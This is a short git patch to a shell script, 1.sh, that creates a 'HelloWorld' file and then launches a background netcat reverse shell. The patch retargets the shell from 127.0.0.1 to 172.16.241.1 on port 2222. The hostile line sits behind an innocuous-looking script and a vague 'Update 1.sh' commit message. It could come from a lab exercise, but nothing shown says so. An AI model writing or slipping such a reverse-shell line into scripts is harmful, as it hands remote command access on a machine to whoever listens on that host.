From 2b713ee024f6039fc244b6156165a0f7ab2023f1 Mon Sep 17 00:00:00 2001 From: Coding Date: Sat, 12 Aug 2017 22:47:11 +0800 Subject: [PATCH] Update 1.sh --- 1.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/1.sh b/1.sh index c58c499..745d5d8 100644 --- a/1.sh +++ b/1.sh @@ -1,2 +1,2 @@ touch HelloWorld -nc 127.0.0.1 2222 -e "/bin/sh"& +nc 172.16.241.1 2222 -e "/bin/sh"&